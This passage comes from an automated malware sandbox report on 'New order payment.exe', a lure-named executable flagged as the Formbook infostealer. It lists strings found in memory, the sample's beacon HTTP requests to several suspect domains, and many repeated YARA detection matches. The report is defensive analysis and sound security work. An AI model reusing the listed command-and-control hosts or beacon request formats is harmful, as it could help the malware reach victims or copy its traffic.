72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
          Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpString found in binary or memory: http://181ue.com/sq.html?entry=
          Source: New order payment.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: New order payment.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
          Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
          Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
          Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
          Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpString found in binary or memory: https://pre-mpnewyear.uc.cn/iceberg/page/log?domain=
          Source: svchost.exe, 0000000E.00000002.505372144.0000000003EB2000.00000004.00020000.sdmpString found in binary or memory: https://track.uc.cn/collect
          Source: unknownDNS traffic detected: queries for: www.salvationshippingsecurity.com
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=eYxsMd5wljUn1Fg6115NyaMNAPOWoN8Xbg1oh/XArMcWaLbikdCkMKkIXUVVkDc1SuQ5&5j=0BKPgh7X4n HTTP/1.1Host: www.salvationshippingsecurity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=RrR08BH4oIo+gx361vOF46QRRg434M3aJQMobyGncW6ZpM1n/iVBy8ajhiKV3UdnqaZn&5j=0BKPgh7X4n HTTP/1.1Host: www.heyunshangcheng.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&5j=0BKPgh7X4n HTTP/1.1Host: www.crisisinterventionadvocates.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=Js+sgmRaIVUq7qFzsJAJ+9AXXLZC0X79cc7qqoZBkLaFxYs1smoq8VOLmQUttipLhfLz&5j=0BKPgh7X4n HTTP/1.1Host: www.srchwithus.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&5j=0BKPgh7X4n HTTP/1.1Host: www.itskosi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=Mi491nAN/W8j69kCQou8To2ktmeGxZt9RYONiJPW2rEgEezOpzjOfOleU2kzp5ym9Hqq&5j=0BKPgh7X4n HTTP/1.1Host: www.sejiw3.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?EvGDLnJ=FQ+FDzcRNFqTHDas5QzX/ZxEACq3iyWpSRLff56TNweY9Uo4XxUeKhcbnwpchSkctfqz&5j=0BKPgh7X4n HTTP/1.1Host: www.hanansalman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: New order payment.exe, 00000000.00000002.244197590.000000000074A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FC2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: New order payment.exe
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: New order payment.exeStatic file information: Suspicious name
          Source: New order payment.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.New order payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.New order payment.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.New order payment.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New order payment.exe.f020000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.New order payment.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.New order payment.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.New order payment.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.New order payment.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New order payment.exe.f020000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.New order payment.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
